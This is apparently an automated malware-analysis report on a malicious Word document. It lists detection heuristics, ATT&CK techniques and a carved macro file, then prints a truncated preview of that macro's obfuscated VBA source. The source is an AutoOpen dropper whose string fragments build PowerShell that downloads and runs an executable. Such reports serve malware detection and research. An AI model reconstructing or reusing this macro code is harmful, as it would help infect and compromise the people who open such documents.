Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains legacy WordBasic and VBA macros, with a critical heuristic firing for a Shell() call within the VBA code. The AutoOpen macro is present and configured to execute a shell command, indicating a downloader or dropper functionality. The ClamAV signature 'Img.Dropper.PhishingLure-6443153-0' further supports its malicious nature as a phishing lure dropper.
Heuristics (7)
- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 64a57d8892bd74886ac9c8517e08d83afecd47569eab0736ccbef13f183fb1d8) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44153 bytes |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "vIVlGqb"
Sub AutoOpen()
On Error Resume Next
GtiDDkRjh = (1869133 - CSng(4790317) - (9628869 * Log(9941026 - Chr(rYIizwB)) + cYzCIBP + CInt(MEZfhEGnRIF + mtOUPlj)))
GpVoNbARG = (859619 - CSng(326934) - (5300140 * Log(3060013 - Chr(GwUZUVmRV)) + rqwSjKfmX + CInt(IlrPLDhnAi + jpmjwtvvP)))
uoUEwWchi = (9219249 - CSng(4839129) - (2948375 * Log(775478 - Chr(IUFENQozRmBLBM)) + mQkrIaTRnTpb + CInt(FEJAcudLqphiau + hClVQuvfoY)))
vUoCSlYpo = (8762512 - CSng(2387221) - (5564407 * Log(303599 - Chr(GjavaCMhfwjk)) + UKEKYUbjaoIY + CInt(JplBLEA + OhUzFmL)))
Application.Run "uoQjdwcFpqb", LaoHjkHh
NosShDEfk = (6818902 - CSng(7603219) - (1600012 * Log(4923463 - Chr(juRXWsX)) + ikfkiFckKTiQTl + CInt(pqAFJBRXwbBhnC + itoRKHnzZwC)))
zYTaJivwb = (6402046 - CSng(4203608) - (7537742 * Log(2594074 - Chr(MNiJcXphilobCa)) + CtbHHBtDWRTmo + CInt(uMGbVwuFnwa + SqilijUK)))
ZoujFtTJM = (8439979 - CSng(1790761) - (7102925 * Log(274462 - Chr(oYiAjct)) + FijvjCVljnSiBG + CInt(aVcilsvnq + LBKChzrQ)))
ciQzKKQob = (1625752 - CSng(4235692) - (3576166 * Log(4468474 - Chr(hFIfDwI)) + JrqkXBK + CInt(BnaNZXCaKSOw + nRXnGTEuC)))
End Sub
Function LaoHjkHh()
On Error Resume Next
wdlCwaDF = ("ije-host'+' Kk4_.EQXa+Q3aU+3aUXaxceQXa+QXaptQXa+QXa'+'ion.'+'Message;QXa+QXa}}QXa) -replaCE ([chaR]75+[chaR]10TpTzzcdDjNHj4moTIZ")
zGANzfcjIqt = (3003951 - CSng(9176780) - (3760962 * Log(7477146 - Chr(wjXSEWf)) + KPwEtccHfEO + CInt(GcfAUTSilwFHrZ + YOpXRDXiDTw)))
XpXPwIP = (7842243 - CSng(1376421) - (929314 * Log(6626563 - Chr(qFovWAXwlEzs)) + KoMUADtqh + CInt(ujzcjXiLdDMOCC + EYqqlMGiQsi)))
oSNQwsuZ = Mid(wdlCwaDF, 3, 109)
jwjYp = ("p3Ck2nwS4LEtt7CCjomuw9chaR]92-cREPL'+'aceQXaRZhQXa,[chaR]39) ) 3a'+'U)-rePlACe 3aUQXa3aU,[ChAR]'+'39)fdX. ( OFUeNV:pu'+'BliRJJsmo15QH")
VHfQWaQPPD = (5787650 - CSng(2069800) - (4346911 * Log(7149826 - Chr(NYFHspomworbkr)) + BYQiEkQQBQSnI + CInt(jtFdXqVDK + KKdiivNdEBXFu)))
GZRZCb = (8396455 - CSng(6347325) - (1963007 * Log(9486337 - Chr(DqZBfWQu)) + zNBWwNcUtHil + CInt(DoiHsazN + MtOzUNIiGRkIPQ)))
pjHNoUQ = Mid(jwjYp, 23, 102)
XvwWPFDkwU = ("torH4EPYE0qcr61it7+[chaR]52),[chaR]36-rep3aU+3aUlaCE QXaB4F'+'QXa,[fUrIzIF77pwsHCld")
UjfBAoIEkI = (8069102 - CSng(1269077) - (5552239 * Log(5310918 - Chr(kNPvWawDMYCwT)) + zMnvJHOisqdPvK + CInt(VIXoNNbIkFtj + dkHfYEkQCLS)))
tvKHwlpQZ = (3836786 - CSng(5083193) - (372779 * Log(4019724 - Chr(RHioRrQiKG)) + WDCpQYkEIjwr + CInt(aVSzEUmLGjTwP + MmUcVRTNMAVCvq)))
iXCQz = Mid(XvwWPFDkwU, 18, 50)
wRVqq = ("CaXa1, 3QXa+'+'QXa43245);K'+'k4huas QXa+Q3aU+3aUXa=QXa+QXa Kk4QXa+Q'+'Xa3aU+3aUenv:'+'pubQXa+QXalic + QXa+QXaRQXaH9DNpoPVJ8tds01vROi4WJnd0w2AS0Q")
lEJXqjtT = (5728943 - CSng(351053) - (3718933 * Log(3606385 - Chr(YiqqPAnHrYQ)) + KXZjJZuGEm + CInt(wcdPPzw + FdjULIrLhdFKdP)))
IUOVJ = (4947746 - CSng(6861970) - (4937483 * Log(3669863 - Chr(UcYMaliuOmkX)) + sYKubCOa + CInt(NNczcajCt + wRdXjRJihOdZw)))
ROjlVktNz = Mid(wRVqq, 3, 111)
kQcDqdkoPzd = ("PHGvM5B]97+[CHAR]85),[strINg][CHAR]39).RepLACe(([CHAR]79+[CHAR]70+[CHAR]85),[so8c0QKaLFoPLtJY6vdK3Ua2joE")
YQajcOChiY = (1987775 - CSng(5009535) - (1809475 * Log(4223043 - Chr(iZdBRjBfIBEb)) + qDWvPZt + CInt(ZzhlpHbif + rHvjtDKWIQqsJ)))
RWHcb = (3328698 - CSng(160206) - (3795506 * Log(8885031 - Chr(VOKkcTIbw)) + bYZwdMMTH + CInt(JSlsQdXh + QkVNMNQiHfcaR)))
lKSAR = Mid(kQcDqdkoPzd, 8, 71)
VSCINjawkzN = ("TME2ni4RqcJv5BZdJ1jZk+QXaZQXa+QXahB4FRQXa+QXaZh QXa+QXa+ KQXa+QXak4karapaQXa+QXas +'+' RZh.exQXa+QXaeRZh'+';foreach(Kk4QXa+QX'+'aabc inQXa+QXa Kk4bcd){t3aU+3aUry{KQXa+QXak4fra3aU+3aUnc.8IaCMNosktov8FUMwa")
EAicZqG = (2637761 - CSng(7947588) - (4740899 * Log(5546920 - Chr(CPwthENr)) + UmMSIwUdwkGY + CInt(URHwiNjiII + SPbNJcWt)))
MGnjVj = (3700739 - CSng(552208) - (8583108 * Log(334113 - Chr(NqhHksoWmi)) + hliWzIGMiCAtUG + CInt(UOMFVcPokr
... (truncated)